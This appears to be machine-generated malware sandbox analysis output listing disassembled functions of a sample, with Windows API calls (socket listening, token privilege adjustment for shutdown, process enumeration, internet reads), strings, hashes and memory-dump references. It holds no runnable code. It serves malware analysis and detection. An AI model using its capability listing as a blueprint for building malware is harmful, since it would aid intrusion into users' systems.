                                                                  • Opcode ID: c7027b03cd3a413931d6d43094830c41431ae12732820483571f7d3f377d58d0
                                                                  • Instruction ID: edf96a8b92e8ec24540ea2f36bf43babc233fd9f12c32d2021bbc3d4efe2f71e
                                                                  • Opcode Fuzzy Hash: c7027b03cd3a413931d6d43094830c41431ae12732820483571f7d3f377d58d0
                                                                  • Instruction Fuzzy Hash: 6C912A71D00218ABDF12DF95DC91EDEBBB8EF09710F10815AF915AB291DB705A45CFA0
                                                                  Function 003979D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0038B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0038B180
                                                                    • Part of subcall function 0038B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0038B1AD
                                                                    • Part of subcall function 0038B134: GetLastError.KERNEL32 ref: 0038B1BA
                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00397A0F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                  • String ID: $@$SeShutdownPrivilege
                                                                  • API String ID: 2234035333-194228
                                                                  • Opcode ID: 0e2475ab0e1699f1aa38b63ddd875687f170ffb34b585dcdf7eb4995451a67d6
                                                                  • Instruction ID: eef4fbcbde84fe250423523733833bf1104bccdd1a7a20791375e4346897232c
                                                                  • Opcode Fuzzy Hash: 0e2475ab0e1699f1aa38b63ddd875687f170ffb34b585dcdf7eb4995451a67d6
                                                                  • Instruction Fuzzy Hash: 1C012B716793126AFF2B2674DC8BBBF735C9B00390F250825FD43E62C2D6649E0082B4
                                                                  Function 00359B60 Relevance: 9.8, Strings: 7, Instructions: 1055COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ERCP$ICTRLCREATETREEVIEW$VUUU$VUUU$VUUU$VUUU$?
                                                                  • API String ID: 0-13670414
                                                                  • Opcode ID: 758a5ae261ec5cf009cdf0640aff7598d16d8d0254c890f773ac3eacd7878a4c
                                                                  • Instruction ID: 2fbab9e769da6c03db54940bc4ae04f5c32d2031c5e81f4ded61679fe9c5af01
                                                                  • Opcode Fuzzy Hash: 758a5ae261ec5cf009cdf0640aff7598d16d8d0254c890f773ac3eacd7878a4c
                                                                  • Instruction Fuzzy Hash: D792CE72E1061ACBDF26CF58C840BADB3B5BB54311F16829AEC16AB390D7309D85DF91
                                                                  Function 003A8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003A8CA8
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8CB7
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 003A8CD3
                                                                  • listen.WSOCK32(00000000,00000005), ref: 003A8CE2
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8CFC
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 003A8D10
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1279440585-0
                                                                  • Opcode ID: 1ebc3a9e63eee61d5b60692b5d1766ebe33f701f802163f1e9aa93f8549eea53
                                                                  • Instruction ID: 532921f8f68ac1bab4a8b4d84589d58076fb3baa0fb1691570db0f87d34427e7
                                                                  • Opcode Fuzzy Hash: 1ebc3a9e63eee61d5b60692b5d1766ebe33f701f802163f1e9aa93f8549eea53
                                                                  • Instruction Fuzzy Hash: 8121EF316002009FCB12EF28DC85B6EB7ADEF49720F118159F916AB2E2CB30AD018B51
                                                                  Function 00396532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00396554
                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00396564
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00396583
                                                                  • __wsplitpath.LIBCMT ref: 003965A7
                                                                  • _wcscat.LIBCMT ref: 003965BA
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003965F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                  • String ID:
                                                                  • API String ID: 1605983538-0
                                                                  • Opcode ID: 589ef0ef47fb5a30258855bdf2d3cc12308a5d10ba6b27d8115b95a19a7102ed
                                                                  • Instruction ID: e55e1b6d01aae2dec85175102e55df7deb73af1d1ac4af4856d1bda2f830d6b7
                                                                  • Opcode Fuzzy Hash: 589ef0ef47fb5a30258855bdf2d3cc12308a5d10ba6b27d8115b95a19a7102ed
                                                                  • Instruction Fuzzy Hash: 57219271901219ABDF22ABA4DC89FEEB7BCAB09300F5004A5E505E7141EB759F85CB60
                                                                  Function 003913CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003913DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: ($,2@$<2@$|
                                                                  • API String ID: 1659193697-2353487846
                                                                  • Opcode ID: 256ab99ebeeca8a2fcf37146e44f9ec91d5d727e41aef46f363249454f18b2c2
                                                                  • Instruction ID: 66b2272301a96ee2bf33238a27c8cf45a2fe8d2bbfe20337f39052dfb9a6ab13
                                                                  • Opcode Fuzzy Hash: 256ab99ebeeca8a2fcf37146e44f9ec91d5d727e41aef46f363249454f18b2c2
                                                                  • Instruction Fuzzy Hash: 33322675A007069FCB29DF69C48096AB7F0FF48310B16C56EE49AEB7A1E770E941CB44
                                                                  Function 003A923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003AA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003AA84E
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 003A9296
                                                                  • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003A92B9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 4170576061-0
                                                                  • Opcode ID: 423104ec28b25db582f9214a8f5322dc62d1ed8826d02650199c8a8726340a12
                                                                  • Instruction ID: eac64811f4c29a06eb181f5f00d6014b77a9e339fa3a1d50bc20f5abc92876c4
                                                                  • Opcode Fuzzy Hash: 423104ec28b25db582f9214a8f5322dc62d1ed8826d02650199c8a8726340a12
                                                                  • Instruction Fuzzy Hash: B041CC70600204AFDB16AF28C882F7E77EDEF45724F048849F956AF2E2CB749D018B91
                                                                  Function 0039EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0039EB8A
                                                                  • _wcscmp.LIBCMT ref: 0039EBBA
                                                                  • _wcscmp.LIBCMT ref: 0039EBCF
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0039EBE0
                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0039EC0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 2387731787-0
                                                                  • Opcode ID: 9c3b15a78645ccd124478c6af547b315830a83d057ffbfce175ff22d9c06f3f6
                                                                  • Instruction ID: e9419f4a7c1e1888f9a36c610234fc118c6ae8aa4e9d1ca948630cb8f6d2d3d9
                                                                  • Opcode Fuzzy Hash: 9c3b15a78645ccd124478c6af547b315830a83d057ffbfce175ff22d9c06f3f6
                                                                  • Instruction Fuzzy Hash: 5341C035604702DFCB1ADF28C490AAAB3E8FF49324F10455EE95A8B3A1DB31A944CF91
                                                                  Function 003B8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  • Opcode ID: cdd8f5c793ed004dea4438f7987ae09d2b5e4abcf17d18e46e2f345b8e48b32d
                                                                  • Instruction ID: f2dca52673f2d32656c8cf4a66dfd12fbb2e65e6445ba1001df51bc1830ab509
                                                                  • Opcode Fuzzy Hash: cdd8f5c793ed004dea4438f7987ae09d2b5e4abcf17d18e46e2f345b8e48b32d
                                                                  • Instruction Fuzzy Hash: 181190317025106BE7231F2AEC44EAF779DEF45764F054429F94AD7651CF30D902C6A4
                                                                  Function 0036E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0036E014,771B0AE0,0036DEF1,003EDC38,?,?), ref: 0036E02C
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0036E03E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 2574300362-192647395
                                                                  • Opcode ID: 89d7056f9d0d8350132a3f6f137bf7514d64f79ecf2fb647d152abbc49f34aed
                                                                  • Instruction ID: 0288e578c17a0913a49c875e5fb20dc63963b499e5084dd30c8cf8176fb1f14c
                                                                  • Opcode Fuzzy Hash: 89d7056f9d0d8350132a3f6f137bf7514d64f79ecf2fb647d152abbc49f34aed
                                                                  • Instruction Fuzzy Hash: 9ED05E75440712DEC7224B61ED0871277D8AB00300F29842BA492A21D0D6F8C88486A0
                                                                  Function 00363B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                  • String ID: @$ A$ A$ A
                                                                  • API String ID: 3728558374-1712067833
                                                                  • Opcode ID: 203ee4d1578eeca578e65afb1fa800b6ea30e208825a3cbc24f80f13abbc2d52
                                                                  • Instruction ID: 0b8ce685e2b36f0b14071db25402411835058cce891709763f33325023611ef8
                                                                  • Opcode Fuzzy Hash: 203ee4d1578eeca578e65afb1fa800b6ea30e208825a3cbc24f80f13abbc2d52
                                                                  • Instruction Fuzzy Hash: A972AC75E042089FCF26DF94C481EAEBBB9EF48300F15C05AED06AB255D771AE45CB91
                                                                  Function 0036B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 0036B22F
                                                                    • Part of subcall function 0036B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0036B5A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Proc$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 2749884682-0
                                                                  • Opcode ID: 826d73a16094a870b959a6a48d58eb13a330bd654313a6e7b6ffed580eb8bccc
                                                                  • Instruction ID: c555856eadb382ddc0af8dd6bb4e4fa7d8f1a93e178735570af4655443be0d06
                                                                  • Opcode Fuzzy Hash: 826d73a16094a870b959a6a48d58eb13a330bd654313a6e7b6ffed580eb8bccc
                                                                  • Instruction Fuzzy Hash: B3A191B0114005BAD73B6F2A8C69FBFAA9CEB42344F11C51DF501D6999CB15DC80DB72
                                                                  Function 003A4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003A43BF,00000000), ref: 003A4FA6
                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003A4FD2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                  • String ID:
                                                                  • API String ID: 599397726-0
                                                                  • Opcode ID: 79eef2fb7fd5dee3ca222751039f7f7cbca617a74492eb7a596159c1b922ce15
                                                                  • Instruction ID: e711ce452f544a2943f75c009fe97980fe83dc6c2b625c0bcdc84db2c1b186c3
                                                                  • Opcode Fuzzy Hash: 79eef2fb7fd5dee3ca222751039f7f7cbca617a74492eb7a596159c1b922ce15
                                                                  • Instruction Fuzzy Hash: 2941F971604309BFEB22DE94DC85FBFB7BCEB82754F10406EF60566180DBB19E4196A0
                                                                  Function 003577B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \Q@
                                                                  • API String ID: 4104443479-1335567171
                                                                  • Opcode ID: 0daf27d57e0d445737d1e9b6c5ecdd6bb6bd4a565dc894734dcfe586a914a0bc
                                                                  • Instruction ID: 0c7a2cb76f3f0bf502d75a5a6687215bbb38a36b2176e0a235e3257fa9fe10cb
                                                                  • Opcode Fuzzy Hash: 0daf27d57e0d445737d1e9b6c5ecdd6bb6bd4a565dc894734dcfe586a914a0bc
                                                                  • Instruction Fuzzy Hash: CDA25C75D04219CFCB26CF58D480BADBBB5FF48311F2681AAD859AB3A0D7309E85DB50
                                                                  Function 0039E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0039E20D
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0039E267
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0039E2B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1682464887-0
                                                                  • Opcode ID: 11287dc21951bf1393fa2a4e84048b9d5d17f37883715a7e2968cc4f8616b17c
                                                                  • Instruction ID: 265dfd15225eb5f075a450ccec6be81a0a8974825f0b057292a9a1a32527492e
                                                                  • Opcode Fuzzy Hash: 11287dc21951bf1393fa2a4e84048b9d5d17f37883715a7e2968cc4f8616b17c
                                                                  • Instruction Fuzzy Hash: 70216075A00118EFCB01EFA5D885EADBBB8FF48310F0584AAE946AB361DB319905CB54
                                                                  Function 0038B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036F4EA: std::exception::exception.LIBCMT ref: 0036F51E
                                                                    • Part of subcall function 0036F4EA: __CxxThrowException@8.LIBCMT ref: 0036F533
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0038B180
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0038B1AD
                                                                  • GetLastError.KERNEL32 ref: 0038B1BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1922334811-0
                                                                  • Opcode ID: 6b770fb41f926e1e15e5c5c54362fbb0fed0acb57b60f25a00b2363559ecfd5a
                                                                  • Instruction ID: c7ce95d356d61ef607661b94df529a89a24af868efdc8c11c139360f80801278
                                                                  • Opcode Fuzzy Hash: 6b770fb41f926e1e15e5c5c54362fbb0fed0acb57b60f25a00b2363559ecfd5a
                                                                  • Instruction Fuzzy Hash: 0D11BCB2400305AFE719AF64EC89D2BB7BCFF44310B20852EE0569B641DB70FC418B60
                                                                  Function 00396606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00396623
                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00396664
                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0039666F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
